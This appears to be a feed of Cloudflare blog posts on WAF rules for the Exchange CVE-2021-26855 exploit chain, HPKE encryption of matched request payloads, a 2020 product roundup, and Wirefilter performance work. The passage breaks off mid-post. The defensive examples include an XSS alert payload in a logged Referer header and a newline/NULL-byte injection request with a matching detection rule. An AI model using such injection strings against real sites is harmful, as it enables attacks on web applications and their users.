If you are running the Cloudflare WAF and have enabled the Cloudflare Specials ruleset, there is nothing else you need to do. We have taken the unusual step of immediately deploying these rules in “Block” mode given active attempted exploitation.

If you wish to disable the rules for any reason, e.g., you are experiencing a false positive mitigation, you can do so by following these instructions:

  1. Log in to the Cloudflare dashboard, click on the Cloudflare Firewall tab, and then Managed Rules.
  2. Click on the “Advanced” link at the bottom of the Cloudflare Managed Ruleset card and search for rule ID 100179. Select any appropriate action or disable the rule.
  3. Repeat step #2 for rule ID 100181.

Server-Side Mitigation

In addition to blocking attacks at the edge, we recommend that you follow Microsoft’s urgent recommendation to patch your on-premise systems immediately. For those that are unable to immediately patch their systems, Microsoft posted yesterday with interim mitigations that can be applied.

To determine whether your system is (still) exploitable, you can run an Nmap script posted by Microsoft to GitHub: https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse.

Vulnerability Details

The attacks observed in the wild take advantage of multiple CVEs that can result in exfiltration of email inboxes and remote code execution when chained together. Security researchers at Volexity have published a detailed analysis of the zero-day vulnerabilities.

Briefly, attackers are:

  1. First exploiting a server-side request forgery (SSRF) vulnerability documented as CVE-2021-26855 to send arbitrary HTTP requests and authenticate as the Microsoft Exchange server.
  2. Using this SYSTEM-level authentication to send SOAP payloads that are insecurely deserialized by the Unified Messaging Service, as documented in CVE-2021-26857. An example of the malicious SOAP payload can be found in the Volexity post linked above.
  3. Additionally taking advantage of CVE-2021-26858 and CVE-2021-27065 to upload arbitrary files such as webshells that allow further exploitation of the system along with a base to move laterally to other systems and networks. These file writes require authentication but this can be bypassed using CVE-2021-26855.

All four of the CVEs listed above are blocked by the recently deployed Cloudflare Specials rules: 100179 and 100181. Additionally, existing rule ID 100173, also enabled to Block by default, partially mitigates these vulnerabilities by blocking the upload of certain scripts.

Additional Recommendations

Organizations can deploy additional protections against this type of attack by adopting a Zero Trust model and making the Exchange server available only to trusted connections. The CVE guidance recommends deploying a VPN or other solutions to block attempts to reach public endpoints. In addition to the edge mitigations from the Cloudflare WAF, your team can protect your Exchange server by using Cloudflare for Teams to block all unauthorized requests.

Using HPKE to Encrypt Request Payloads

Post Syndicated from Miguel de Moura original https://blog.cloudflare.com/using-hpke-to-encrypt-request-payloads/

The Managed Rules team was recently given the task of allowing Enterprise users to debug Firewall Rules by viewing the part of a request that matched the rule. This makes it easier to determine what specific attacks a rule is stopping or why a request was a false positive, and what possible refinements of a rule could improve it.

The fundamental problem, though, was how to securely store this debugging data as it may contain sensitive data such as personally identifiable information from submissions, cookies, and other parts of the request. We needed to store this data in such a way that only the user who is allowed to access it can do so. Even Cloudflare shouldn’t be able to see the data, following our philosophy that any personally identifiable information that passes through our network is a toxic asset.

This means we needed to encrypt the data in such a way that the user can decrypt it, but Cloudflare cannot; in other words, public key encryption.

Now we needed to decide on which encryption algorithm to use. We came up with some questions to help us evaluate which one to use:

  • What requirements do we have for the algorithm?
  • What language do we implement it in?
  • How do we make this as secure as possible for users?

Here’s how we made those decisions.

Algorithm Requirements

While we knew we needed to use public key encryption, we also needed to keep an eye on performance. This led us to select Hybrid Public Key Encryption (HPKE) early on as it has a best-of-both-worlds approach to using symmetric as well as public-key cryptography to increase performance. While these best-of-both-worlds schemes aren’t new [1][2][3], HPKE aims to provide a single, future-proof, robust, interoperable combination of a general key encapsulation mechanism and a symmetric encryption algorithm.

HPKE is an emerging standard developed by the Crypto Forum Research Group (CFRG), the research body that supports the development of Internet standards at the IETF. The CFRG produces specifications called RFCs (such as RFC 7748 for elliptic curves) that are then used in higher level protocols including two we talked about previously: ODoH and ECH. Cloudflare has long been a supporter of Internet standards, so HPKE was a natural choice to use for this feature. Additionally, HPKE was co-authored by one of our colleagues at Cloudflare.

How HPKE Works

HPKE combines an asymmetric algorithm such as elliptic curve Diffie-Hellman and a symmetric cipher such as AES. One of the upsides of HPKE is that the algorithms aren’t dictated to the implementer, but making a combination that’s provably secure and meets the developer’s intuitive notions of security is important. All too often developers reach for a scheme without carefully understanding what it does, resulting in security vulnerabilities.

HPKE solves these problems by providing a high level of security in a generic manner and providing necessary hooks to tie messages to the context in which they are generated. This is the application of decades of research into the correct security notions and schemes.


HPKE is built in stages. First it turns a Diffie-Hellman key agreement into a Key Encapsulation Mechanism. A key encapsulation mechanism has two algorithms: Encap and Decap. The Encap algorithm creates a symmetric secret and wraps it in a public key, so that only the holder of the private key can unwrap it. An attacker with the encapsulation cannot recover the random key. Decap takes the encapsulation and the private key associated to the public key, and computes the same random key. This translation gives HPKE the flexibility to work almost unchanged with any kind of public key encryption or key agreement algorithm.

HPKE mixes this key with an optional info argument, as well as information relating to the cryptographic parameters used by each side. This ensures that attackers cannot modify messages’ meaning by taking them out of context. A postcard marked “So happy to see you again soon” is ominous from the dentist and endearing from one’s grandmother.

The specification for HPKE is open and available on the IETF website. It is on its way to becoming an RFC after passing multiple rounds of review and analysis by cryptography experts at the CFRG. HPKE is already gaining adoption in IETF protocols like ODoH, ECH, and the new Messaging Layer Security (MLS) protocol. HPKE is also designed with the post-quantum future in mind, since it is built to work with any KEM, including all the NIST finalists for post-quantum public-key encryption.

Implementation Language

Once we had an encryption scheme selected, we needed to settle on an implementation. HPKE is still fairly new, so the libraries aren’t quite mature yet. There is a reference implementation, and we’re in the process of developing an implementation in Go as part of CIRCL. However, in the absence of a clear “go to” that is widely known to be the best, we decided to go with an implementation leveraging the same language already powering much of the Firewall code running at the Cloudflare edge – Rust.

Aside from this, the language benefits from features like native primitives, and crucially the ability to easily compile to WebAssembly (WASM).

As we mentioned in a previous blog post, customers are able to generate a key pair and decrypt payloads either from the dashboard UI or from a CLI. Instead of writing and maintaining two different codebases for these, we opted to reuse the same implementation across the edge component that encrypts the payloads and the UI and CLI that decrypt them. To achieve this we compile our library to target WASM so it can be used in the dashboard UI code that runs in the browser. While this approach may yield a slightly larger JavaScript bundle size and relatively small computational overhead, we found it preferable to spending a significant amount of time securely re-implementing HPKE using JavaScript WebCrypto primitives.

The HPKE implementation we decided on comes with the caveat of not yet being formally audited, so we performed our own internal security review. We analyzed the cryptography primitives being used and the corresponding libraries. Between the composition of said primitives and secure programming practices like correctly zeroing memory and safe usage of random number generators, we found no security issues.

Making It Secure For Users

To encrypt on behalf of users, we need them to provide us with a public key. To make this as easy as possible, we built a CLI tool along with the ability to do it right in the browser. Either option allows the user to generate a public/private key pair without needing to talk to Cloudflare servers at all.

In our API, we specifically do not accept the private key of the key pair — we don’t want it! We don’t need and don’t want to be able to decrypt the data we’re storing.

For the dashboard, once the user provides the private key for decryption, the key is held in a temporary JavaScript variable and used for the in-browser decryption. This allows the user to not constantly have to provide the key while browsing the Firewall event logs. The private key is also not persisted in any way in the browser, so any action that refreshes the page such as refreshing or navigating away will require the user to provide the key again. We believe this is an acceptable usability compromise for better security.

How Payload Extraction Works

After deciding how to encrypt the data, we just had to figure out the rest of the feature: what data to encrypt, how to store and transmit it, and how to allow users to decrypt it.

When an HTTP request reaches the L7 Firewall, it is evaluated against a set of rulesets. Each of these rulesets contains several rules written in the wirefilter syntax.

An example of one such rule would be:

http.request.version eq "HTTP/1.1"
and
(
    http.request.uri.path matches "\n+."
    or
    http.request.uri.query matches "\x00+."
)

This expression evaluates to a boolean “true” for HTTP/1.1 requests that either contain one or more newlines followed by a character in the request path or one or more NULL bytes followed by a character in the query string.

Say we had the following request that would match the rule above:

GET /cms/%0Aadmin?action=%00post HTTP/1.1
Host: example.com

If matched data logging is enabled, the rules that matched are executed again in a special context that tags all fields accessed during execution. We use a second execution because this tagging adds noticeable computational overhead, and since the vast majority of requests don’t trigger a rule at all, tagging every request would add overhead unnecessarily. Requests that do match will typically match only a few rules, so we don’t need to re-execute a large portion of the ruleset.
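Conceptually, the tagging context behaves like the following sketch. The names are hypothetical; the real engine hooks into Wirefilter’s execution context:

use std::cell::RefCell;
use std::collections::{HashMap, HashSet};

// Field reads go through this wrapper, which records which fields a rule
// actually touched during its second, tagged execution.
struct TaggingCtx<'a> {
    fields: &'a HashMap<String, String>,
    accessed: RefCell<HashSet<String>>,
}

impl<'a> TaggingCtx<'a> {
    fn get(&self, name: &str) -> Option<&str> {
        self.accessed.borrow_mut().insert(name.to_string());
        self.fields.get(name).map(String::as_str)
    }
}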

You may notice that although http.request.uri.query matches "\x00+." evaluates to true for this request, it won’t be executed, because the expression short-circuits with the first or condition that also matches. This results in only http.request.version and http.request.uri.path being tagged as accessed:

http.request.version -> HTTP/1.1
http.request.uri.path -> /cms/%0Aadmin

Having gathered the fields that were accessed, the Firewall engine does some post-processing; removing fields that are a subset of others (e.g., the query string and the full URI), or truncating fields that are beyond a certain character length.
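A rough sketch of the subset-removal step (illustrative only; the real post-processing is more involved):

// Drop any field whose value is contained within another field's value,
// e.g. the query string when the full URI is also present.
fn remove_subset_fields(mut fields: Vec<(String, String)>) -> Vec<(String, String)> {
    let values: Vec<String> = fields.iter().map(|(_, v)| v.clone()).collect();
    fields.retain(|(_, v)| {
        !values.iter().any(|other| other != v && other.contains(v.as_str()))
    });
    fields
}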

Finally, these get serialized as JSON, encrypted with the customer’s public key, serialized again as a set of bytes, and prefixed with a version number should we need to change/update it in the future. To simplify consumption of these blobs, our APIs display a base64-encoded version of the bytes.
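Putting that pipeline together looks roughly like this sketch. The version value is an assumption, encrypt_with_public_key is a hypothetical stand-in for the HPKE step, and serde_json/base64 refer to the commonly used crates of those names:

use std::collections::BTreeMap;

// Stand-in for the HPKE step: a real implementation would Encap to the
// customer's public key and seal the JSON bytes.
fn encrypt_with_public_key(plaintext: &[u8]) -> Vec<u8> {
    plaintext.to_vec()
}

fn serialize_matched_data(fields: &BTreeMap<String, String>) -> String {
    let json = serde_json::to_vec(fields).expect("fields serialize to JSON");
    let ciphertext = encrypt_with_public_key(&json);
    let mut blob = vec![1u8]; // assumed version prefix
    blob.extend_from_slice(&ciphertext);
    base64::encode(&blob) // the base64 blob our APIs display
}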


Now that we have encrypted the data at the edge and persisted it in ClickHouse, we need to allow users to decrypt it. As part of enabling this feature, users generated a key pair: the public key, used to encrypt the payloads, and a private key, used to decrypt them. Decryption is done completely offline, either via the command line using cloudflare/matched-data-cli:

$ MATCHED_DATA=AkjQDktMX4FudxeQhwa0UPNezhkgLAUbkglNQ8XVCHYqPgAAAAAAAACox6cEwqWQpFVE2gCFyOFsSdm2hCoE0/oWKXZJGa5UPd5mWSRxNctuXNtU32hcYNR/azLjsGO668Jwk+qCdFvmKjEqEMJgI+fvhwLQmm4=
$ matched-data-cli decrypt -d $MATCHED_DATA -k $PRIVATE_KEY
{"http.request.version": "HTTP/1.1", "http.request.uri.path": "/cms/%0Aadmin"}

Or via the dashboard UI.


Since our CLI tool is open-source and HPKE is interoperable, it can also be used in other tooling as part of a user’s logging pipeline, for example in security information and event management (SIEM) software.

Conclusion

This was a team effort with help from our Research and Security teams throughout the process. We relied on them for recommendations on how best to evaluate the algorithms as well as vetting the libraries we wanted to use.

We’re very pleased with how HPKE has worked out for us from an ease-of-implementation and performance standpoint. It was also an easy choice for us to make due to its impending standardization and best-of-both-worlds approach to security.

Holistic web protection: industry recognition for a prolific 2020

Post Syndicated from Patrick R. Donahue original https://blog.cloudflare.com/cloudflare-named-the-innovation-leader-in-holistic-web-protection/

I love building products that solve real problems for our customers. These days I don’t get to do so as much directly with our Engineering teams. Instead, about half my time is spent with customers listening to and learning from their security challenges, while the other half of my time is spent with other Cloudflare Product Managers (PMs) helping them solve these customer challenges as simply and elegantly as possible. While I miss the deeply technical engineering discussions, I am proud to have the opportunity to look back every year on all that we’ve shipped across our application security teams.

Taking the time to reflect on what we’ve delivered also helps to reinforce my belief in the Cloudflare approach to shipping product: release early, stay close to customers for feedback, and iterate quickly to deliver incremental value. To borrow a term from the investment world, this approach brings the benefits of compounded returns to our customers: we put new products that solve real-world problems into their hands as quickly as possible, and then reinvest the proceeds of our shared learnings immediately back into the product.

It is these sustained investments that allow us to release a flurry of small improvements over the course of a year, and be recognized by leading industry analyst firms for the capabilities we’ve accumulated and distributed to our customers. Today we’re excited to announce that Frost & Sullivan has named Cloudflare the Innovation Leader in their Frost Radar™: Global Holistic Web Protection Market Report. Frost & Sullivan’s view that this market “will gradually absorb the markets formed around legacy and point solutions” is consistent with our view of the world, and we’re leading the way in “the consolidation of standalone WAF, DDoS mitigation, and Bot Risk Management solutions” they believe is “poised to happen before 2025”.

Image © 2020 Frost & Sullivan from Frost Radar™: Global Holistic Web Protection Market Report

We are honored to receive this recognition, based on the analysis of 10 providers’ competitive strengths and opportunities as assessed by Frost & Sullivan. The rest of this post explains some of the capabilities that we shipped in 2020 across our Web Application Firewall (WAF), Bot Management, and Distributed Denial-of-Service product lines, the scope of Frost & Sullivan’s report. Get a copy of the Frost & Sullivan Frost Radar™ report here to see why Cloudflare was named the Innovation Leader.

2020 Web Security Themes and Roundup

Before jumping into specific product and feature launches, I want to briefly explain how we think about building and delivering our web security capabilities. The most important “product” by far that’s been built at Cloudflare over the past 10 years is the massive global network that moves bits securely around the world, as close to the speed of light as possible. Building our features atop this network allows us to reject the legacy tradeoff of performance or security. And equipping customers with the ability to program and extend the network with Cloudflare Workers and Firewall Rules allows us to focus on quickly delivering useful security primitives such as functions, operators, and ML-trained data—then later packaging them up in streamlined user interfaces.

We talk internally about building up the “toolbox” of security controls so customers can express their desired security posture, and that’s how we think about many of the releases over the past year that are discussed below. We begin by providing the saw, hammer, and nails, and let expert builders construct whatever defenses they see fit. By watching how these tools are put to use and observing the results of billions of attempts to evade the erected defenses, we learn how to improve and package them together as a whole for those less inclined to build from components. Most recently we did this with API Shield, providing a guided template to create “positive security” models within Firewall Rules using existing primitives plus new data structures for strong authentication such as Cloudflare-managed client SSL/TLS certificates. Each new tool added to the toolbox increases the value of the existing tools. Each new web request—good or bad—improves the models that our threat intelligence and Bot Management capabilities depend upon.

Web application firewall (WAF) usability at scale


Last year we spoke with many customers about our plan to decouple configuration from the zone/domain model and allow rules to be set for arbitrary paths and groups of services across an account. In 4Q2020 we put this granular control in the hands of a few developers and some of our most sophisticated enterprise customers, and we’re currently collecting and incorporating feedback before defaulting the capabilities on for new customers.

Rules are great, especially with increased flexibility, but without data structures and request enrichment at the edge (such as the Bot Management techniques described below) they cannot act on anything beyond static properties of the request. In 3Q2020 we released our IP Lists capabilities and customers have been steadily uploading their home-grown and third-party subscription lists. These lists can be referenced anywhere in a customer’s account as named variables and then combined with all other attributes of the request, even Bot Management scores, e.g., http.request.uri.path contains “/login” and (not ip.src in $pingdom_probes and cf.bot_management.score < 30) is a Firewall Rule filter that blocks all bots except Pingdom from accessing the login endpoint.
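For readability, here is that example filter laid out in the multi-line style used elsewhere in this post:

http.request.uri.path contains "/login"
and (
    not ip.src in $pingdom_probes
    and cf.bot_management.score < 30
)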

Requests that are blocked or challenged need to find their way as quickly as possible to our customers’ SOCs for triage, investigation and, occasionally, incident response, so we upgraded our edge-logging framework in 2Q2020 to push real-time, security-specific logs directly to customer SIEMs. And in 4Q2020, we released the ability to encrypt sensitive payloads within these logs using customer-provided encryption keys and a novel encryption scheme termed “Hybrid Public Key Encryption” (HPKE), along with a data localization suite to provide control over where our customers’ data is stored and protected.

Built predominantly in 4Q2020 and currently being tested in the Firewall Rules engine is a brand new implementation of our Rate Limiting engine. By moving this matching and enforcement logic from a standalone tool to a component within a performant, memory-safe, expressive engine built in Rust, we have increased the utility of existing functions. Additional examples of improving this library of capabilities include the work completed in 1Q2020 to add HMAC functions and regex-based HTTP header and body inspection to the engine.

Bots and machine learning (ML)


In addition to making edge data sets accessible for request evaluation, we continued to invest heavily within our Bot Management team to provide actionable data so that our customers could decide what (if any) automated traffic they wanted to allow to interact with their applications. Our highest priority for Bot research and development has always been efficacy, and last year was no different. A significant portion of our engineering effort was dedicated to our detection engines — both updating and iterating on existing systems or creating entirely new detection engines from scratch.

In 1Q2020 we completed a total rewrite of our Machine Learning engine, and are continually focused on improving the efficacy of our ML engines. To do this, we draw on one of our major competitive advantages: the massive amount of data flowing through Cloudflare’s network. The early 2020 upgrade to our ML model nearly doubled the number of features we use to evaluate and score requests. And to help customers better understand why requests are flagged as bots, we have recently complemented the bot likelihood score in our logs with attribution to the specific engine that generated the score.

Also in 1Q2020, we upgraded our behavioral analysis engine to incorporate more features and increase overall accuracy. This engine conducts histogram-based outlier scoring and is now fully deployed to nearly all Bot Management zones.

In 2Q2020, we developed a lightweight JavaScript element that further advanced our browser fingerprinting capabilities and aids in detection. Specifically, we now silently challenge browsers and detect if a browser is misrepresenting its User Agent. This technique will be incorporated into our ML models and combined with our heuristics engine for more accurate browser fingerprinting. This feature is entirely optional and can be enabled or disabled by customers through our UI and API. Customers with extremely performance sensitive zones or traffic types that are unsuitable for JavaScript (such as API or some mobile app traffic) can still be accurately scored by our Bot Management engine.

In addition to detection, we also spent (and will continue to spend) engineering effort on mitigation. Our entire JavaScript and CAPTCHA challenge platform was rewritten in the last year and deployed to our customer zones in a staged fashion in the second half of 2020. Our new platform is faster and more robust at detecting automated systems attempting to solve the challenges. More importantly, this platform allows us to further invest in new challenge types and modes as we enter 2021.

The biggest and most well received feature released in 2020 was our dedicated Bot Management analytics, released in 3Q2020. We now present informative graphs that double as diagnostic tools. Customers have found that analytics are far more than interesting charts and statistics: in the case of Bot Management, analytics are essential to spotting and subsequently eliminating false positives.

Last but definitely not least, we announced the deprecation of the __cfduid cookie in 4Q2020. The cookie was used primarily to detect bots, but caused confusion for some customers, including questions about whether they needed to display a cookie banner because of what we do.

To get a sense of the Bot Attack trends we saw in the first half of 2020, take a read through this blog post. And if you’re curious about how our ML models and heuristic engines work to keep your properties safe, this deep dive by Alex Bocharov, Machine Learning Tech Lead on the Bots team, is an excellent guide.

API and IoT security and protection


At the beginning of 4Q2020, we released a product called API Shield that was purpose built to secure, protect, and accelerate API traffic — and will eventually provide much of the common functionality expected in traditional API Gateways. The UI for API Shield was built on top of Firewall Rules for maximum flexibility, and will serve as the jump-off point for configuring additional API security features we have planned this year.

As part of API Shield, every customer now gets a fully managed, domain-scoped private CA generated for each of their zones, and we plan to continue working closely with the SSL/TLS team to expand CA management options based on feedback. Since the release, we’ve seen great adoption, in particular from IoT companies focused on locking down their APIs using short-lived client certificates distributed out to devices. Customers can also now upload OpenAPI schemas to be matched against incoming requests from these devices, with bad requests being dropped at the edge rather than passed on to origin infrastructure.

Another capability we released in 4Q2020 was support for gRPC-based API traffic. Since that release, customers have expressed significant interest in using Cloudflare as a secure API gateway between easy-to-use customer-facing JSON endpoints and internal-facing gRPC or GraphQL endpoints. Like most customer challenges at Cloudflare, early adopters are looking to solve these use cases initially with Cloudflare Workers, but we’re keeping an eye on whether there are aspects for which we’ll want to provide first-class feature support.

Distributed Denial-of-Service (DDoS) protections for web applications and APIs


The application-layer security of a web application or API is of minimal importance if the service itself is not available due to a persistent DDoS attack at L3-L7. While mitigating such attacks has long been one of Cloudflare’s strengths, attack methodologies evolve and we continued to invest heavily in 2020 to drop attacks more quickly, more efficiently, and more precisely; as a result, automatic mitigation techniques are applied immediately and most malicious traffic is blocked in less than 3 seconds.

Early in 2020 we responded to a persistent increase in smaller, more localized attacks by fine-tuning a system that can autonomously detect attacks on any server in any datacenter. In the month prior to us first posting about this tool, it mitigated almost 300,000 network-layer attacks, roughly 55 times more than the tool we previously relied upon. This new tool, dubbed “dosd”, leverages Linux’s eXpress Data Path (XDP) and allows our system to quickly and automatically deploy eBPF rules that run on each packet received. We further enhanced our edge mitigation capabilities in 3Q2020 by developing and releasing a protection layer that can operate even in environments where we only see one side of the TCP flow. These network layer protections help protect our customers who leverage both Magic Transit to protect their IP ranges and our WAF to protect their applications and APIs.

To document and provide visibility into these attacks, we released a GraphQL-backed interface in 1Q2020 called Network Analytics. Network Analytics extends the visibility of attacks against our customers’ services from L7 to L3, and includes detailed attack logs containing data such as top source and destination IPs and ports, ASNs, data centers, countries, bit rates, protocol and TCP flag distributions. A litany of improvements made to this graphical rendering engine over the course of 2020 has benefitted all analytics tools using the same front-end. In 4Q2020, Network Analytics was extended to provide traffic and attack insights into Cloudflare Spectrum-protected applications, which are terminated at L4 (TCP/UDP).

Towards the end of 4Q2020, we released real-time DDoS attack alerting capable of sending emails or pages via PagerDuty to alert security teams of ongoing attacks and mitigations. This capability was released just in time to assist with the onslaught of ransomware attacks that Cloudflare helped detect and defend against. For additional context on unique attacks we fought off in 2020, consider reading about an acoustics-inspired attack, a 754 million packet-per-second flood, or a roundup of attacks from 1Q2020, 2Q2020, or 3Q2020.

Wrapping up and looking towards 2021

2020 was a tough year around the world. Throughout what has also been, and continues to be, a period of heightened cyberattacks and breaches, we feel proud that our teams were able to release a steady flow of new and improved capabilities across several critical security product areas reviewed by Frost & Sullivan. These releases culminated in far greater protections for customers at the end of the year than the beginning, and a recognition for our sustained efforts.

We are pleased to have been named the Innovation Leader in their Frost Radar™: Global Holistic Web Protection Market Report, which “addresses organizations’ demand for consolidated, single pane of glass solutions, which not only reduce the security gaps of legacy products but also provide simplified management capabilities”.

As we look towards 2021 we plan to continue releasing early and often, listening to feedback from our customers, and delivering incremental value along the way. If you have ideas on what additional capabilities you’d like to use to protect your applications and networks, we’d love to hear them below in the comments.

Encrypting your WAF Payloads with Hybrid Public Key Encryption (HPKE)

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/encrypt-waf-payloads-hpke/

The Cloudflare Web Application Firewall (WAF) blocks more than 72B malicious requests per day from reaching our customers’ applications. Typically, our users can easily confirm these requests were not legitimate by checking the URL, the query parameters, or other metadata that Cloudflare provides as part of the security event log in the dashboard.

Sometimes investigating a WAF event requires a bit more research and a trial and error approach, as the WAF may have matched against a field that is not logged by default.

Not logging all parts of a request is intentional: HTTP headers and payloads often contain sensitive data, including personally identifiable information, which we consider a toxic asset. Request headers may contain cookies and POST payloads may contain username and password pairs submitted during a login attempt among other sensitive data.

We recognize that providing clear visibility in any security event is a core feature of a firewall, as this allows users to better fine tune their rules. To accomplish this, while ensuring end-user privacy, we built encrypted WAF matched payload logging. This feature will log only the specific component of the request the WAF has deemed malicious — and it is encrypted using a customer-provided key to ensure that no Cloudflare employee can examine the data*. Additionally, the crypto uses an exciting new standard — developed in part by Cloudflare — called Hybrid Public Key Encryption (HPKE).

*All Cloudflare logs are encrypted at rest. This feature implements a second layer of encryption for the specific matched fields so that only the customer can decrypt it.

Encrypting Matched Payloads

To turn on this feature, you need to provide a public key, or generate a private-public key pair directly from the dashboard. Your data will then be encrypted using Hybrid Public Key Encryption (HPKE), which offers a great combination of both performance and security.

To simplify this process, we have built an easy-to-use command line utility to generate the key pair:

$ matched-data-cli generate-key-pair
{
  "private_key": "uBS5eBttHrqkdY41kbZPdvYnNz8Vj0TvKIUpjB1y/GA=",
  "public_key": "Ycig/Zr/pZmklmFUN99nr+taURlYItL91g+NcHGYpB8="
}

Cloudflare does not store the private key and it is our customers’ responsibility to ensure it is stored safely. Lost keys, and the data encrypted with them, cannot be recovered but customers can rotate keys to be used with future payloads.

Once encrypted, payloads will be available in the logs as encrypted base64 blobs within the metadata field:

"metadata": [
  {
    "key": "encrypted_matched_data",
    "Value": "AdfVn7odpamJGeFAGj0iW2oTtoXOjVnTFT2x4l+cHKJsEQAAAAAAAAB+zDygjV2aUI92FV4cHMkp+4u37JHnH4fUkRqasPYaCgk="
  }
]

Decrypting payloads can be done via the dashboard from the Security Events log, or by using the command line utility, as shown below. If done via the dashboard, the browser will decrypt the payload locally (i.e., client side) and will not send the private key to Cloudflare.

$ printf $PRIVATE_KEY | ./matched-data-cli decrypt -d AdfVn7odpamJGeFAGj0iW2oTtoXOjVnTFT2x4l+cHKJsEQAAAAAAAAB+zDygjV2aUI92FV4cHMkp+4u37JHnH4fUkRqasPYaCgk= --private-key-stdin

The command above returns:

{"REQUEST_HEADERS:REFERER":"https:\/\/example.com\/testkey.txt?a=<script>alert('xss');<\/script>"}

In the example above, the WAF matched against the REQUEST_HEADERS:REFERER field. Any other fields the WAF matched on would be similarly logged.

Better Logging with User Privacy in Mind

In the coming months, this feature will be available on our dashboard to our Enterprise customers. Enterprise customers who would like this feature enabled sooner should reach out to their account team. Only application owners who also have access to the Cloudflare dashboard as Super Administrators will be able to configure encrypted matched payload logging. Those who do not have access to the private key, including Cloudflare staff, are not able to decrypt the logs.

We are also excited for this feature to be one of our first to use Hybrid Public Key Encryption, and for Cloudflare to use this emerging standard developed by the Crypto Forum Research Group (CFRG), the research body that supports the development of Internet standards at the IETF. And stay tuned, we will publish a deep dive post with the technical details soon!

Building even faster interpreters in Rust

Post Syndicated from Zak Cutner original https://blog.cloudflare.com/building-even-faster-interpreters-in-rust/

At Cloudflare, we’re constantly working on improving the performance of our edge — and that was exactly what my internship this summer entailed. I’m excited to share some improvements we’ve made to our popular Firewall Rules product over the past few months.

Firewall Rules lets customers filter the traffic hitting their site. It’s built using our engine, Wirefilter, which takes powerful boolean expressions written by customers and matches incoming requests against them. Customers can then choose how to respond to traffic which matches these rules. We will discuss some in-depth optimizations we have recently made to Wirefilter, so you may wish to get familiar with how it works if you haven’t already.

Minimizing CPU usage

As a new member of the Firewall team, I quickly learned that performance is important — even in our security products. We look for opportunities to make our customers’ Internet properties faster where it’s safe to do so, maximizing both security and performance.

Our engine is already heavily used, powering all of Firewall Rules. But we have bigger plans. More and more products like our Web Application Firewall (WAF) will be running behind our Wirefilter-based engine, and it will become responsible for eating up a sizable chunk of our total CPU usage before long.

How to measure performance?

Measuring performance is a notoriously tricky task, and as you can probably imagine trying to do this in a highly distributed environment (aka Cloudflare’s edge) does not help. We’ve been surprised in the past by optimizations that look good on paper, but, when tested out in production, just don’t seem to do much.

Our solution? Performance measurement as a service — an isolated and reproducible benchmark for our Firewall engine and a framework for engineers to easily request runs and view results. It’s worth noting that we took a lot of inspiration from the fantastic Rust Compiler benchmarks to build this.

Our benchmarking framework, showing how performance during different stages of processing Wirefilter expressions has changed over time [1].

What to measure?

Our next challenge was to find some meaningful performance metrics. Some experimentation quickly uncovered that time was far too volatile a measure for meaningful comparisons, so we turned to hardware counters [2]. It’s not hard to find tools to measure these (perf and VTune are two such examples), although they (mostly) don’t allow control over which parts of the program are recorded. In our case, we wished to individually record measurements for different stages of filter processing — parsing, compilation, analysis, and execution.

Once again we took inspiration from the Rust compiler, and its self-profiling options, using the perf_event_open API to record counters from inside our binary. We then output something like the following, which our framework can easily ingest and store for later visualization.

Output of our benchmarks in JSON Lines format, showing a list of recordings for each combination of hardware counter and Wirefilter processing stage. We’ve used 10 repeats here for readability, but we use around 20, in addition to 5 warmup rounds, within our framework.
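As a rough illustration of recording such counters from inside a binary, here is a sketch using the perf-event crate, one of several Rust wrappers over perf_event_open (and not necessarily the one our framework uses):

use perf_event::{events::Hardware, Builder};

fn main() -> std::io::Result<()> {
    // Count retired instructions for just the code between enable/disable.
    let mut counter = Builder::new().kind(Hardware::INSTRUCTIONS).build()?;
    counter.enable()?;
    let work: u64 = (0..1_000).sum(); // stand-in for e.g. the parsing stage
    counter.disable()?;
    println!("instructions: {} (result: {})", counter.read()?, work);
    Ok(())
}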

Whilst we mainly focussed on metrics relating to CPU usage, we also use a combination of getrusage and clear_refs to find the maximum resident set size (RSS). This is useful to understand the memory impact of particular algorithms in addition to CPU.

But the challenge was not over. Cloudflare’s standard CI agents use virtualization and sandboxing for security and convenience, but this makes accessing hardware counters virtually impossible. Running our benchmarks on a dedicated machine gave us access to these counters, and ensured more reproducible results.

Speeding up the speed test

Our benchmarks were designed from the outset to take an important place in our development process. For instance, we now perform a full benchmark run before releasing each new version to detect performance regressions.

But with our benchmarks in place, it quickly became clear that we had a problem. Our benchmarks simply weren’t fast enough — at least if we wanted to complete them in less than a few hours! The problem was that we have a very large number of filters. Since our engine would never usually execute requests against this many filters at once, benchmarking them all was proving incredibly costly. We came up with a few tricks to cut this down…

  • Deduplication. It turns out that only around a third of filters are structurally unique (something that is easy to check as Wirefilter can helpfully serialize to JSON). We managed to cut down a great deal of time by ignoring duplicate filters in our benchmarks.
  • Sampling. Still, we had too many filters and random sampling presented an easy solution. A more subtle challenge was to make sure that the random sample was always the same to maintain reproducibility.
  • Partitioning. We worried that deduplication and sampling would cause us to miss important cases that are useful to optimize. By first partitioning filters by Wirefilter language feature, we can ensure we’re getting a good range of filters. It also helpfully gives us more detail about where specifically the impact of a performance change is.

Most of these are trade-offs, but very necessary ones that allow us to run continual benchmarks without development speed grinding to a halt. At the time of writing, we’ve managed to get a benchmark run down to around 20 minutes using these ideas.
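The reproducible-sampling trick, for instance, amounts to fixing the RNG seed so every run sees the same filters. A minimal sketch using the rand crate’s StdRng and SliceRandom APIs:

use rand::{rngs::StdRng, seq::SliceRandom, SeedableRng};

// Sample a reproducible subset of filters: a fixed seed means every
// benchmark run draws exactly the same sample.
fn sample_filters(filters: &[String], k: usize) -> Vec<&String> {
    let mut rng = StdRng::seed_from_u64(2020); // fixed seed for reproducibility
    filters.choose_multiple(&mut rng, k).collect()
}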

Optimizing our engine

With a benchmarking framework in place, we were ready to begin testing optimizations. But how do you optimize an interpreter like Wirefilter? Just-in-time (JIT) compilation, selective inlining, and replication were some ideas floating around in the world of interpreters that seemed attractive. After all, we previously wrote about the cost of dynamic dispatch in Wirefilter. All of these techniques aim to reduce that effect.

However, running some real filters through a profiler tells a different story. Most execution time, around 65%, is spent not resolving dynamic dispatch calls but instead performing operations like comparison and searches. Filters currently in production tend to be pretty light on functions, but throw in a few more of these and even less time would be spent on dynamic dispatch. We suspect that even a fair chunk of the remaining 35% is actually spent reading the memory of request fields.

Function | CPU time
`matches` operator | 0.6%
`in` operator | 1.1%
`eq` operator | 11.8%
`contains` operator | 51.5%
Everything else | 35.0%
Breakdown of CPU time while executing a typical production filter.

An adventure in substring searching

